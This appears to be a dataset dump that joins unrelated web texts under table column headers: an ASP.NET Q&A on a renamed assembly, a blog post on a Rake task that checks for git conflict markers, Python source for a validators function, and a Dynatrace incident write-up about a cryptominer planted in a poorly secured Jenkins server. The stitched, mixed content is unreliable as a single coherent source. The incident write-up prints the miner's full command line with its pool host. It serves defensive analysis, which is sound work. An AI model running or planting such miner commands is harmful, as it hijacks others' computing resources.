text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Question: One of my websites references a library in my solution called "Foo" That project generates a file called "Foo.dll" and the classes in it are in a namespace called "MyCompany.Foo" so far everything worked out...well I right clicked on project "Foo" and changed the filename it outputs to to be "MyCompany.Foo"....now the project generates a file "MyCompany.Foo.dll" everything still compiles ok but when I try to access my site it says it can't find the reference or file "Foo" Parser Error Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately. Parser Error Message: Could not load file or assembly 'Foo' or one of its dependencies. The system cannot find the file specified. Solution:1 Nevermind it was my own stupidity. In my web.config, I had a reference to Foo that I needed to change to MyCompany.Foo I did a global search for Foo.dll...but in this case the assembly was referenced w/o the dll on the end Solution:2 It could be a number of things. Open visual studio and your solution file. Then type ctrl+f and search for Foo.dll in ALL solution. Replace any occurences of Foo.dll with MyCompany.Foo.dll hope this helps. edit: In case you changed the namespaces in foo.dll from namespace foo to namespace MyCompany.Foo then you might need to make additional changes but i guess you won't need. Also, make sure that in your ASP.NET project, the reference entry has Copy Local property set to True. Note:If u also have question or solution just comment us below or mail us on toontricks1994@gmail.com EmoticonEmoticon
http://www.toontricks.com/2018/05/tutorial-aspxrenamed-librarynow-error.html
CC-MAIN-2018-43
refinedweb
302
69.18
Testing Your Code’s Text The “Ubiquitous Automation” chapter of The Pragmatic Programmer opens with the following quote: Civilization advances by extending the number of important operations we can perform without thinking. –Alfred North Whitehead As a responsible and accomplished developer, when you encounter a bug in your application, what’s the first thing you do? Write a failing test case, of course, and only once that’s done do you focus on fixing the problem. But what about when the bug is not related to the behavior of your application, but rather to its configuration, display, or some other element outside the purview of normal testing practices? I contend that you can and should still write a failing test. Scenario: In the process of merging a topic branch into master, you encounter a conflict in one of your ERB files. You fix the conflict and commit the resolution, run the test suite, and then deploy your changes to production. An hour later, you receive an urgent email from your client wondering what happened to the footer of their site. As it turns out, there were two conflicts in the file, and you only fixed the first, committing the conflict artifacts of the second into the repo. Your gut instinct is to zip off a quick fix, write a self-deprecating commit message, and act like the whole thing never happened. But consider writing a rake task like this: namespace :preflight do task :git_conflict do paths = `grep -lir '<<<\\|>>>' app lib config`.split(/\n/) if paths.any? puts "\ERROR: Found git conflict artifacts in the following files\n\n" paths.each {|path| puts " - #{path}" } exit 1 end end end This task greps through your app, lib, and config directories looking for occurrences of <<<or >>>and, if it finds any, prints a list of the offending files and exits with an error. Hook this into the rake task run by your continuous integration server and never worry about accidentally deploying errant git artifacts again: namespace :preflight do task :default do Rake::Task['cover:ensure'].invoke Rake::Task['preflight:all'].invoke end task :all do Rake::Task['preflight:git_conflict'].invoke end task :git_conflict do paths = `grep -lir '<<<\\|>>>' app lib config`.split(/\n/) if paths.any? puts "\ERROR: Found git conflict artifacts in the following files\n\n" paths.each {|path| puts " - #{path}" } exit 1 end end end Rake::Task['cruise'].clear task :cruise => 'preflight:default' We’ve used this technique to keep our deployment configuration in order, to ensure that we’re maintaining best practices, and to keep our applications in shape as they grow and team members change. Think of it as documentation taken to the next level – text to explain the best practice, code to enforce it. Assuming you’re diligent about running your tests, every one of these tasks you write is a problem that will never make it to production.
https://www.viget.com/articles/testing-your-codes-text/
CC-MAIN-2022-21
refinedweb
481
60.24
Source code for validators.between from .extremes import Max, Min from .utils import validator @validator[docs]def between(value, min=None, max=None): """ Validate that a number is between minimum and/or maximum value. This will work with any comparable type, such as floats, decimals and dates not just integers. This validator is originally based on `WTForms NumberRange validator`_. .. _WTForms NumberRange validator: Examples:: >>> from datetime import datetime >>> between(5, min=2) True >>> between(13.2, min=13, max=14) True >>> between(500, max=400) ValidationFailure(func=between, args=...) >>> between( ... datetime(2000, 11, 11), ... min=datetime(1999, 11, 11) ... ) True :param min: The minimum required value of the number. If not provided, minimum value will not be checked. :param max: The maximum value of the number. If not provided, maximum value will not be checked. .. versionadded:: 0.2 """ if min is None and max is None: raise AssertionError( 'At least one of `min` or `max` must be specified.' ) if min is None: min = Min if max is None: max = Max try: min_gt_max = min > max except TypeError: min_gt_max = max < min if min_gt_max: raise AssertionError('`min` cannot be more than `max`.') return min <= value and max >= value
http://validators.readthedocs.io/en/latest/_modules/validators/between.html
CC-MAIN-2018-13
refinedweb
195
60.51
Note: This post is based on an early preview version of the ASP.Net MVC Framework and much will happen until the next milestone.In this post I will show how we can handle errors that occur in a Controller’s Action method.The Controller base class has a virtual method with the name OnError, this method takes three arguments, actionName, methodInfo and exception. It also has a return type of a Boolean. The idea when using the OnError method is to return true if we have handled the exception or false to letting ASP.Net handle it for us.protected virtual bool OnError(string actionName, System.Reflection.MethodInfo methodInfo, Exception exception) When an exception is thrown within our Action method, the OnError method will be executed. In the OnError method we can for example pass information to a View.Here is an example of a Controller where I will Render a View called “Error” and pass the exception to the View: public class HomeController : Controller{ protected override bool OnError(string actionName, System.Reflection.MethodInfo methodInfo, Exception exception) { RenderView("Error",exception.InnerException); return false; } [ControllerAction] public void Index() { int i = 0; int sum = 10 / i; RenderView("Index"); }} When the Index Action method will be executed a DevidedByZero Exception will be thrown, when this happens the OnError method will be called and it will render a view and return false to specify that the error was handled. To make sure to have a common View for displaying the error message, we put it into the Shared subfolder of the Views folder: /Views /Shared Error.aspx The Error View inherits the ViewData<Exception> class. To make this demo simple I just pass the Exception class to the View and show the value of the Message property: <%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Error.aspx.cs" Inherits="MvcApplication.Views.Error" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ""> <html xmlns="" ><head runat="server"> <title>Untitled Page</title></head><body> <div> <h1>Error on page</h1> <b><%=ViewData.Message %></b> </div></body></html> Simple enough... I really wish I could be playing around with these bits already! Mike Bosch: Soon you will :) Dont play with us, just say when!... please.. :-)) Awesome! Anything like the Flash in RoR or Monorail ? J PHILIP: There is a TempData model which will store info into the Session and is uses a Dictionary and will survive to the next request. I will probably blog about this after I got some sleep ;) You can also use the ViewData property like: ViewData["Error"]= "Error on the page" and then in the View write: <%= ViewData["Error"] %> Link Listing - November 19, 2007 ASP.NET ASP.Net MVC Framework - Exception Handling [Via: Fredrik N ] Link Blogs Interesting Finds:... Well, this is the first time I see something in the MVC framework that I think should be changed. Monorail rescue is a nicer alternative to achieve the same goal. If a rescue-style would be implemented then OnError would be usefull only for advanced scenarios. Pingback from The Daily Find #3 - TechToolBlog You've been kicked (a good thing) - Trackback from DotNetKicks.com I've been playing round with this as well and having an Error view is useful, but usually doesn't really solve all error scenarios well. After all you already get error routing from ASP.NET natively and that should still work with MVC. The real question is how to effectively render errors into the same page because that's by far the most common scenario. Validation errors, input errors, data load errors that might not warrant blowing out to a new page. The real question here becomes what's the 'page' model that can drive more complex scenarios especially where input is concerned without having a bunch of conditional rendering code embedded into the page ASP classic style. It's all nice and neat to have separate pages for everything when everything is nice and modular with one task per page which seems to be all that we've seen so far for MVC examples, but who builds pages like that anymore? Dargos V: The Rescue-style is kind of nice, but if I understand it correctly you only specify the View that should display the exception message, but if I want to log an exception and do it every time an exception is thrown from an Action method the Rescue-style will probably not solve it, right!? And it’s very common that we log exceptions. So instead I should do like some other Java based MVC framework, and that is to point out an Exception handler controller. The onError method will give us more control and we can easy implement the rescue style to the onError method with a few lines of code. Again, I just feel you rewrote Monorail just to put a Microsoft watermark on it..... Isn't that quite of you? Liviu: I'm not an Microsoft employee ;) Wouldn't it be better if RenderView's view argument be an enum type? Easier to refactor, wouldn't it? Note: This is based on the pre-CTP version of the ASP.Net MVC Framework and it is in an early stage. I feel that the name (OnError) is misleading, since in .Net OnSomething methods generally have EventArgs as a parameter and have a corresponding event. Pingback from Wöchentliche Rundablage: ASP.NET MVC, Visual Studio 2008, LINQ, SQL Server 2008,WCF, Surface, Silverlight… | Code-Inside Blog Pingback from ASP.NET MVC preview available » DamienG Not that this matters to much but... I was unable to get the OnError to work correctly in the CTP. I did find however that if you return "false" rather than "true" then everything works like a champ Just thought that if anyone else comes across this page that they should know that By the way... thanks for the post... really good stuff meisinger: In pre-CTP we could use true to specify that the exception was handled, now in the CTP it's changed to false instead. I have updated the post. Thanks for the comment about this :) Pingback from ASP.NET MVC Archived Buzz, Page 1 Lipitor prescription side effects. I've been looking for some way to both effectively log errors, but also a way to ferry them from the business side to the view. Currently I'm using a delegate/event combination in C#. My business side makes an event available to the presentation classes. By doing this, the presentation page is notified immediately when an error occurrs. A resource that handled both error logging and validation errors as well as the display of both to the user would be great... can we use microsoft exeception in mvc framework This post indicates that it was on an early preview, but now it's 2009 and I don't think this post represents how things currently work. There is no OnError method to override on Controllers. Perhaps this was a feature that was introduced and then pulled? If it was never released, it might make sense to pull down this blog post as it may be confusing people. I would agree with Tom; I had to read all the comments to figure out that this was a dead end Or perhaps put a comment at the top indicating that this is DEPRECATED Pingback from ASP .Net MVC – Unhandled Exceptions « packtHub I'm with Tom and KD as well. After reading all about this, I now need to go and find out what the next approach is. A "DEPRECATED" notice is a great idea. Thanks for the read, though. It seems the method has been renamed to OnException and instead of the 3 arguments mentioned in the article, it now receives a single ExceptionContext object which aggregates the controller, action and exception info along with a bunch of other stuff. ASP.NET MVC framework - Security
http://weblogs.asp.net/fredriknormen/archive/2007/11/19/asp-net-mvc-framework-exception-handling.aspx
CC-MAIN-2013-20
refinedweb
1,315
62.98
Imshow produces many windows(c++, Visualstudio) I just would like to run opencv project in Visual Studio.I set all necessarry variables , directory include files and succesfully builded example project. The only problem is; Imshow command produces many window when I run the program.I try to get frames as a Video using videocapture and I am using opencv 2412 x86 version for windows. My example code: #include <opencv2/highgui/highgui.hpp> #include <opencv2/opencv.hpp> #include<iostream> #include<stdio.h> using namespace std; using namespace cv; int main() { Mat kernel; Mat_<float> kernel1(3, 3); int kernel_size; int ind = 0; VideoCapture cap(0); // open the default camera if (!cap.isOpened()) // check if we succeeded return -1; Mat edges; Mat frame; while (true) { cap>>frame; // get a new frame from camera imshow("Livestream", frame); if (waitKey(30) == 27) //wait for 'esc' key press for 30 ms. If 'esc' key is pressed, break loop { cout << "esc key is pressed by user" << endl; break; } } // the camera will be deinitialized automatically in VideoCapture destructor return 0; } After compiling(Pictures): As you see, Imshow produces many frame and window with different names(strange window names) after compiling the program. Any help would be apreciated. mostly, problems like this are due to linking the wrong libs. (e.g. debug libs with release build of your prog) " I am using opencv 2412 x86 version for windows." -- did you build those, locally ? (to my knowledge the prebuild libs are for vs2015, x64 ONLY) I will use another version and inform you about that. I chose opencv 3.0 version for visualstudio and I built opencv with "cmake -gui" for visualstudio2013,It created 2 types of files which is x64 and x86 version to be used in Visual studio.Then I correctly linked everything like libraries, include file etc(opencv_world300.lib , opencv_ts300.lib ,opencv_ts300d.lib opencv_world300d.lib) .It shows nothing now, no window appears.The program succesfully builded but , it shows nothing after I run the program.The program directly closes itself with exit code : -1073741515 (0xc0000135) 'A dependent dll was not found'. please link either opencv_world300.lib or opencv_world300d.lib, but never both ! (and you do not need the ts libs at all, they're only for building unit tests) Hi berak, I tried all solution for this operation.But unfortunately it gives me same error.Visual studio directly close my program with exit code : 'BarcodeRecognition.exe' (Win32): Loaded 'C:\Windows\SysWOW64\tmumh\20019\TmMon\2.5.0.2070\tmmon.dll'. Cannot find or open the PDB file. The program '[7440] BarcodeRecognition.exe' has exited with code -1073741515 (0xc0000135) 'A dependent dll was not found'. in the end: -- your problems are all about setting up your project, and using your ide correctly. I solved it copying dll files for opencv libraries to inside of my main Visual studio application file.Thank you for your help, it works very well now
https://answers.opencv.org/question/178451/imshow-produces-many-windowsc-visualstudio/
CC-MAIN-2021-39
refinedweb
483
67.04
Matlab Coder App - undefined function when generating nested package 7 views (last 30 days) Show older comments Commented: Darshan Ramakant Bhat on 9 Sep 2021 I've been trying to generate C++ for a while now using the Matlab Coder App (GUI), but keep bumping into problems. My final try was to convert the class-based structure to 'simple' functions, but keep a nested package hierarchy for organisational reasons. Additionally, I created a Matlab script that is able to run the code without any issues. Below is a 'minimal working example' that illustrates the problem. D:\exampleproject\ LocalFunction.m CallingScript.m +foo\ NestedFunction.m +bar\ DoubleNestedFunction.m With the following contents: (don't mind the double nested one, even just having a package is enough for trouble) % CallingScript.m clear all A = LocalFunction(5); B = foo.NestedFunction(5); % LocalFunction.m function [outputArg1] = LocalFunction(inputArg1) outputArg1 = inputArg1+1; end % +foo\NestedFunction.m function [outputArg1] = NestedFunction(inputArg1) outputArg1 = inputArg1*2; end The problem starts almost immediately, when trying to define the Entry-Point Functions: Yes its shadowed, but that's the whole point... I've tried this after a fresh reboot of matlab as well, so it's not a problem with local workspace shadowing of the indicated function. So instead I use the '...' to select the function file. This correctly adds the function(s) to the list. However, in the next step, trying to run the script for auto-defining the variable names, the function names are not found: Note that I have tried a lot of different things. Creating a new function handle with the name (thus removing the namespace), using import foo.*, but nothing works to get the script running. So then I manually define the input types (is okay now, but a lot of work for the actual project). Then the next problem is the MEX generation (or actually the execution): Error preparing the test expression 'CallingScript'. Caused by: Compiled function 'D:\exampleproject\NestedFunction_mex.mexw64' is not in the same folder as the MATLAB function 'D:\exampleproject\+foo\NestedFunction.m'. Not surprising since the output of that step results in the following folder tree: Ignoring the error and continuing does yield C++ code, but there the package namespace is removed. Plus I'm not able to verify the right execution with the MEX function. The only way I've seen to retain the namespace is by calling the nested function from the local one, and not defining the nested function as entry-point function... but that is not the way I want to go, since I'm specifically interested in library generation, with the (double) nested functions as entry points. So should I conclude that directly generation namespaces from package functions (as entry-point functions) is impossible? Or is there something I'm missing? In case it is not possible, I would like to put this in as feature request: generating a C++ library with namespace support by providing a package, rather than individual functions... Accepted Answer This is a limitation from MATLAB Coder. Entrypoint function should not be residing inside a package. We already have internal request to remove this limitiation in one of the future release. Workaround : Create a wrapper function which calls the package function internally like below : function [y1,y2] = foo_wrapper(a,b) y1 = foo.NestedFunction(a); y2 = foo.bar.DoubleNestedFunction(b); end Then you can use "foo_wrapper" as the entrypoint. You can specify a namespace in the generated C++ code using below feature : 2 Comments Thank you for the feedback, I will make a request to add this limitation in the document. More Answers (0) See Also Products Community Treasure Hunt Find the treasures in MATLAB Central and discover how the community can help you!Start Hunting!
https://la.mathworks.com/matlabcentral/answers/1449449-matlab-coder-app-undefined-function-when-generating-nested-package
CC-MAIN-2022-27
refinedweb
624
55.24
Introduction You can give any name to a variable but it should be meaningful because it makes code more readable. Here are some examples of meaningful variable names: - salary - height - name - age - total_marks There are certain rules for naming C# variables: - The name may consist of letters, digits, and the underscore character(_) - They must not begin with a digit - Uppercase and lowercase characters are distinct; for example, salary and SALARY are two different variables - It should not be a keyword - White spaces are not allowed - Variable names can be of any length The table shows some examples of valid and invalid C# variable names: - It tells the compiler the name of the variable - It tells about the type of data, a variable holds - The place of the declaration in the program decides the scope of the variable A variable must be declared before it is used in the program. You can use any meaningful name for a variable using any datatype. Here is the variable declaration syntax: datatype varable1, variable2, variable3,....variableN; If the variables to be declared are more than one and of the same data type then we can declare them in the same line separated by comma. A code line in C# always ends with semicolon.Here are some examples of legal variable declaration: float length; int age; char b1,b2; double pi; decimal money; variablename = value; (or) variable1 = variable2 = variable3 = value; If we initialize a variable at the time of declaration then the syntax is: datatype variablename = value; (or) datatype variable1 = value, variable2 = value; int age = 23; bool status = false; float height = 164.5f; char sex = 'F'; int a = 4, b = 6; decimal d = 2.34M; class class1 { public void mymethod() { int x = 10; int y = 10; ............... ............... } } class class1 { static int x = 10; public void mymethod() { Console.Writeline(Class1.x); ......................... ......................... } } public class program { int x = 60; public static void main(string[] args) { program obj = new program(); Console.Writeline(obj.x); int x = 10; Console.Writeline(x); Console.Read(); } } const datatype constantname = value; const float PI = 3.14; const int count = 4; const int length = 10; const int breadth = length * 2; int length = 10; // This is illegal statement because it is using a non-constant value const int breadth = length * 2;
http://codemyne.net/Articles/2010/12/Variables-Constants-in-Csharp
CC-MAIN-2021-43
refinedweb
375
62.51
/**************************************************************** *Exercise 11.13: Telephone Number Word Generator. Standard * *telephone keypads contain thte digits 0 through 9. The * *numbers 2 through 9 each have three letters associated with * *them, as inidcated by the following table: * *2 A B C 6 M N O * *3 D E F 7 P R S * *4 G H I 8 T U V * *5 J K L 9 W X Y * *Write a C program that, given a seven-digit number, writes * *to a file every possible seven-letter word corresponding to * *that number. There are 2187 (3 to the seventh power) such * *words. Avoid phone numbers with the digits 0 and 1. * * * *Cooper's Instructions: Letters in the output file are * *uppercase. Do not accept phone numbers with a zero or one. * *When the user runs the program, prompt them for a phone * *number. If it is invalid, exit with an appropriate comment. * ****************************************************************/ #1 Members - Reputation: 122 Posted 02 November 2008 - 02:55 PM #2 Crossbones+ - Reputation: 4965 Posted 02 November 2008 - 04:40 PM Does that give you any ideas? #3 Members - Reputation: 122 Posted 02 November 2008 - 04:52 PM Also I didn't mention this above, but the way that I have been handling the letter assigned to the different numbers on the phone is using arrays for each number. Such as: char c_Two[3] = {'A', 'B', 'C'}; char c_Three[3] = {'D', 'E', 'F'}; etc... Is this a good way to handle the letters or would it be easier to handle if I just put all the letters in a single array? Or does it even matter? #4 Members - Reputation: 114 Posted 02 November 2008 - 05:04 PM personally i think you should make a loop. using the multidimensional array could save u coding, and work just as fast. since now instead of counting through each array, you count thru one, and for every hit, itd just take another 2 write statements. (hopefully this made sense...) #5 Members - Reputation: 560 Posted 02 November 2008 - 05:11 PM Since this is homework, I can't show you an implementation, but that's an approach you should look at, I think. #6 Members - Reputation: 122 Posted 02 November 2008 - 05:28 PM #7 Members - Reputation: 560 Posted 02 November 2008 - 06:06 PM Quote:It's not infinite... you would quit recursing when the index is the last digit's index. If you haven't studied much recursion then perhaps it isn't the answer you are expected to give. #8 Members - Reputation: 122 Posted 02 November 2008 - 06:22 PM #9 Moderators - Reputation: 1682 Posted 03 November 2008 - 08:53 AM For an input of N > 0 digits, there are three times as many outputs as for (N - 1) digits, each of N length. We construct them by, for each of three possible symbols for the first digit, for each result for the other digits, outputting the symbol followed by the result. #10 Members - Reputation: 122 Posted 03 November 2008 - 11:56 AM For a seven digit number, the seventh digit will loop threw the three letter alternating them each time for each word, such as: A B C A B C etc... Then the sixth digit (N - 1) will alternate the letter every 3 iterations of the seventh digit, such as: A A A B B B C C C etc... Am I even in the ballpark with this thinking? Or as is most likly the case am I way off? #11 Moderators - Reputation: 1682 Posted 03 November 2008 - 12:23 PM For each possible output Oo for the other digits: For each possible letter L for the first digit: Use recursion to output (L, followed by Oo, followed by a newline). However, L has to get inserted "in between" the Oo outputs, which makes things tricky. Also, it isn't clear what to do when we hit the base case of the recursion. The solution is to pass the "result so far" as a parameter for the recursion. It looks like: We are given Op, which is some possible output for the previous digits. If there are no more digits, output Op and a newline, and return (we are done). For each possible output Oo for the next digits: For each possible letter L for the current digit: Call the function recursively, using Op + L for the new value of Op. This way, we build up the output string as we "dive into" the recursion, and each time we "hit bottom", we get another of the possible options. It also works to reverse the order of the two loops - that way gives a different sorting order. As an exercise, reason out what the order will be with each approach, and then test it. Keep in mind that calculating "Op + V" is tricky in C. You can't just add strings like that; you'll have to append the V character manually. If recursion scares you, you might be able to get your head around it by imagining that you are writing several functions: one that handles seven letters and zero digits by outputting the letters; one that handles six letters and one digit by generating each letter that's possible for the digit, and then calling the seven-letter-and-zero-digit function with each; one that handles five letters and two digits by generating each letter that's possible for the first digit, and then calling the six-letter-and-one-digit function with each of those options, etc. And then you can observe that, with a little bit of generalization work, these functions are actually all the same. And there's really nothing different about a function calling itself, versus calling another function; it's still calling a function, which works in the same way, with the new call getting its own copy of parameters and local variables. You just have to make sure that you don't get stuck in a loop, by defining a base case. #12 Members - Reputation: 122 Posted 03 November 2008 - 04:29 PM This should be pretty easy for someone who's passed intermediate algebra should it? I just don't understand why I can't wrapped my head around how to solve this. Zahlman dang near gave me the answer and I still don't get it. Maybe I should start with something more basic. Try to do something that's similar but on a smaller scale. It's a good thing this isn't do for another two weeks otherwise I'd be in big trouble. #13 Members - Reputation: 840 Posted 03 November 2008 - 10:47 PM Quote: So let's count on paper: 0 1 2 3 4 5... Hm, what's happening here? How do we know after 0 cames 1, after 1 comes 2, after 2 comes 3 and so on? These are just the digits of our decimal system, written down in ascending order. We just KNOW that, there's no further explanation. Let's go on: 5 6 7 8 9 10... Wait a minute, what just happened? Apparently, 9 is the last digit that we know, so we can't just use the next digit - there simply is none. The digit reverts back to 0, and we introduce a second digit to the left that now has the value 1. Let's go on: 10 11 12 13 14 15 16 17 18 19 20... Aha! The first digit reverted back to 0 once again, and the second digit changed from 1 to 2. This happens again ten steps later: 20 21 22 23 24 25 26 27 28 29 30... See? Now what happens if the second digit also reaches 9? Let's analyse: 90 91 92 93 94 95 96 97 98 99 100... Do you see a pattern? Apparently, every time the leftmost digit overflows, we introduce a new digit with the value 1. Thus we get arbitrarily large numbers. Now, if you handle fixed width numbers, we start with all digits at 0. Leading zeroes don't change the value of the number, 007 is the same as 7 (except when James Bond is involved). This simplifies matters, because we don't have to introduce new digits. For example, three digit numbers:90 091 092 093 094 095 096 097 098 099 100... What happens if we reach the last number? 990 991 992 993 994 995 996 997 998 999 000... Aha, we're back to the start! So how do we get from 198 to 199 for example? We start of the rightmost digit. 8 is not the highest possible digit, so we just set it to the next digit 9. Done, 199 is the next number. That was simple! Now what's the next number? We can't just increase the rightmost digit, because it is already at the maximum. So we set it back to 0 and look at the next digit. Again, it is already at the maximum, so we set that to 0 and look at the next digit. 1 is increased to 2, and we get 200. You can implement this as recursion or iteration. Now just replace the width three with whatever you need, I think it was seven, and replace the digits 0123456789 with your letters, I think it was ABC. #14 Members - Reputation: 840 Posted 03 November 2008 - 11:35 PM Quote: Oh, I just realized you don't have a fixed set of digits like ABC for the entire number, but every position has its own set of digits. But I'm sure you will figure that out :) Here's a little program I wrote that counts every possible combination of ABC in a seven digit number: #include <iostream> #include <string> #include <vector> template<unsigned width> class Number { std::string available_digits; std::vector<int> current_value; public: Number(std::string available_digits) : available_digits(available_digits), current_value(width) {} bool count() { const int bound = available_digits.size(); for (int i = 0; i < width; ++i) // increase digit and check for overflow if (++current_value[i] < bound) return true; // no overflow -> get out of here else current_value[i] = 0; // overflow -> reset and continue // we have set every digit back to 0 // and indicate that by returning false return false; } friend std::ostream& operator<<(std::ostream& os, const Number& number) { // output the digits of the value // from highest position to lowest position for (int i = width - 1; i >= 0; --i) os << number.available_digits[number.current_value[i]]; return os; } }; int main() { Number<7> n("ABC"); int perm = 0; do std::cout << n << std::endl; while (++perm, n.count()); std::cout << perm << " permutations\n"; } #15 Members - Reputation: 429 Posted 04 November 2008 - 12:25 AM A recursive solution is easiest, but as recursion in C is generally unpretty I'd write it in erlang: -module(tel). -compile(export_all). -define(KEYS, dict:from_list([ {2, [a, b, c]}, {3, [d, e, f]}, {4, [g, h, i]}, {5, [j, k, l]}, {6, [m, n, o]}, {7, [p, r, s]}, {8, [t, u, v]}, {9, [w, x, y]} ])). l_to_upper(L) -> [string:to_upper(atom_to_list(Elt)) || Elt <- L]. cartesian([]) -> [[]]; cartesian([H | R]) -> [[Elt | C] || Elt <- H, C <- cartesian®]. num_to_letters(Num) -> Letters = [dict:fetch(N, ?KEYS) || N <- Num], [l_to_upper(L) || L <- cartesian(Letters)]. Hey, it works! 14> c(tel). {ok,tel} 15> tel:num_to_letters([2,3,4,5,5,6,7]). [["A","D","G","J","J","M","P"], ["A","D","G","J","J","M","R"], ["A","D","G","J","J","M","S"], ... 16> length(tel:num_to_letters([2,3,4,5,5,6,7])). 2187 Then I'd write an erlang-to-C compiler, and it's done. Writing the erlang-to-C compiler is left as an exercise for the reader. #16 Members - Reputation: 122 Posted 04 November 2008 - 03:19 PM D J P A G M T D J P A G M U D J P A G M V D J P A G N T <-- M changes to N, and we loop back to the beginning of 8's set. D J P A G N U D J P A G N V D J P A G O T <-- N changes to O, and we loop back to the beginning of 8s set. etc... Is that the patter of change I should try to achieve? If it is, it would seem like I would need a counter for each phone number position along with if statements to check for looping back the counters when one counter reaches 3. If that's the case I guess that's where recursion might come into play, but unfortunetly I still can't seem to visualize it, even with the examples that have been provided thus far (which I appreciate by the way). #17 Members - Reputation: 840 Posted 04 November 2008 - 07:48 PM Quote: Looks good. #18 Moderators - Reputation: 1682 Posted 04 November 2008 - 09:06 PM Quote: Each recursive call provides one "counter". That counter just counts 3 times; it gets automatically reset when it returns to the parent recursive call, and then the parent recursive call updates *its* counter, and re-calls recursively again. #19 Members - Reputation: 840 Posted 05 November 2008 - 01:11 AM Quote: Unless the parent is the last counter, then we must also stop the recursion (that only happens if we try to increment the highest number and wrap around to 0000000). #20 Members - Reputation: 145 Posted 05 November 2008 - 03:47 AM There are a lot of ways to solve this problem. It would be interesting to compare implementations when this assignment is complete. Shawn
http://www.gamedev.net/topic/513554-c-telephone-number-word-generator/
CC-MAIN-2015-18
refinedweb
2,268
69.31
Recently, in the Dynatrace Innovation Lab, we have been developing best practices and demo applications to showcase delivering software through an automated, unbreakable delivery pipeline using Jenkins and Dynatrace. A couple of weeks into our project, Dynatrace helped us discover that we were part of “one of the biggest mining operations ever discovered”. In this blog post, I want to highlight the pitfalls when it comes to implementing demo or sample projects, how to set them up, and how to keep them alive without getting hijacked. Our Setup We develop most of our demos on public cloud infrastructure and for this particular demo we decided to go with the Google Kubernetes Engine (GKE) on the Google Cloud Platform (GCP). To allow the reproduction of the setup, we scripted the provisioning of the infrastructure and the project on top of it by utilizing a combination of Terraform (for infrastructure provisioning), custom shell scripts (for user generation and utility tasks), and Kubernetes manifests to deploy our application. The cluster itself was of decent size with auto-scaling enabled to fully exploit the power of Kubernetes when it comes to application scaling. Along with the application, we also installed the Dynatrace OneAgent via the Operator approach on our GKE cluster to get full-stack end-to-end visibility for all our workloads as well as all supporting tools (e.g: Jenkins) running on the cluster. Our next step was to install Jenkins in our Kubernetes cluster to have the possibility to build, deploy, and deliver our application. This can be done easily via the public Jenkins repository. Just pick any version, download, and run it. Next step: login and create the pipelines. We started working on our pipelines, installed plugins, managed multi-staged pipelines, and built our own Kubernetes pod templates. Everything worked as expected. A couple of weeks into our project, Dynatrace started alerting on a spike in CPU saturation on one of our Kubernetes nodes. As you can see from the screenshot below, Dynatrace automatically created a problem ticket due to this unusual resource behavior. As Dynatrace not only monitors the host, but all its processes and containers, it was easy to spot that the Jenkins.cicd pod was responsible for taking about 80% of the available CPU on that host. We got suspicious since Jenkins was not actively building any of our artifacts at that time; in fact, it was idle – waiting for new builds to be triggered. But why did it eat up all our CPU? Let’s dig deeper! Luckily, Dynatrace provides detailed information on the processes running on our monitored hosts. When clicking on the problematic Jenkins.cicd process, we can investigate a couple of useful properties. Some of them might be technology related, e.g., Kubernetes namespace or pod names, while others tell us more about the executables that have been started. Let’s look at the suspicious Jenkins.cicd process: The EXE that was actually started, xmrig, wasn’t one we have ever seen before – neither did it look like something that was native to Jenkins. A quick internet search reveals the purpose of this executable: What the hell, someone hijacked our Jenkins instance to inject a crypto miner named xmrig! But who did this? And how could it be started in our Jenkins? Since Dynatrace also tells us the path of the executable, this was is first place to start our search. We found the config.json in the executable path that reveals some of the configuration details of the process: Taking a closer look at the configuration and looking for a particular user that has broken into our Jenkins, we only see a placeholder “YOUR_WALLET_ADDRESS”, unfortunately. Next thing we can try is to find the started process with the name xmrig on our host: root@jenkins-depl-lvb6m:/tmp/dyr/xmrig/xmrig-2.8.1# ps -aux | grep xmrig root 4939 162 0.1 475868 10100 ? Sl Nov23 5755:39 /tmp/dyr/xmrig-2.8.1/xmrig -p qol -o pool.minexmr.com:80 -u -k Hello, here you are user ”, glad we have found you! With a quick verification we can see that it is a valid wallet id: From the detected anomaly it took a couple of clicks and two internet searches to not only identify the root cause but also the crypto miners identity (well – at least his wallet id). Let’s think about why this could happen and how to prevent it in the future. Secure your applications! When we saw the problematic crypto-mining process running on our cluster we were kind of surprised, frankly speaking. Our project was not revealed or advertised to the public, although accessible via public IPs and we have made one of the most ordinary mistakes when using third-party software: we never changed the standard password! Oh gosh, why did this happen to us? Well, in our work in the Innovation Lab we spin up, tear down, and recreate cloud instances several times a day. Sometimes, they don’t live longer than a couple of minutes, sometimes we keep clusters up for a longer period of time if we keep working on them. In this particular case we didn’t change the standard password since we didn’t even know in the beginning if this Jenkins configuration will be the one that will survive one single day. Thus, we stuck to the default password: What a big mistake! On top of this, Jenkins was also available via the standard port on a public IP. But why could the process be started without being noticed that a plugin has been installed or any other configuration has been changed in the Jenkins instance? The answer is quite easy. A security issue in Jenkins earlier this year was exploited that allowed to inject arbitrary software to your Jenkins. In fact, it was one of the biggest mining operations ever discovered and hackers made $3 million by mining Monero (not on our cluster, obviously). If you want to read more about this security hole you can find more information in the National Vulnerability Database, vulnerability CVE-2017-1000353. What could we have done to prevent? I don’t want to leave you without our lessons learned from this security incident, to help you secure your applications and prevent them from being hijacked. - Don’t ever use standard passwords, even for your demo applications. This might sound obvious, but how often do we just start a demo without taking the effort to change the password? I bet this happened to some of you and my advice for the future is to make the password change to one of the first things you do, even if it’s just a small demo application. - Make sure to use the latest software versions. When setting up new projects, make sure to invest some time to find the version of the software with the latest security patches. In addition, make sure to keep your software as well as all installed plugins updated to prevent old security holes from being exploited. - Think about those services you want to expose to the public and those you want to keep private or available only from inside your cluster. A practice we have adopted in the Innovation Lab is the usage of a bastion host, to limit the public access of resources. In addition, review your network configuration and limit open ports or change standard ports of your applications. - Have monitoring in place to detect suspicious activities on your infrastructure. Without Dynatrace we wouldn’t have found the intruder or at least it would have taken lot longer. Why? In the GCP Dashboard we didn’t receive any notification on the state of our cluster since the cluster in total was doing fine. There was only one node that suffered from CPU saturation, but this didn’t affect the overall performance of our application since it was distributed on 10 nodes, from which 9 were doing just fine. - Pets vs Cattles: In case you got hijacked despite taking precautions, keep in mind that with public cloud resources, sometimes it’s easier to just throw them away and spin up new instances and fix 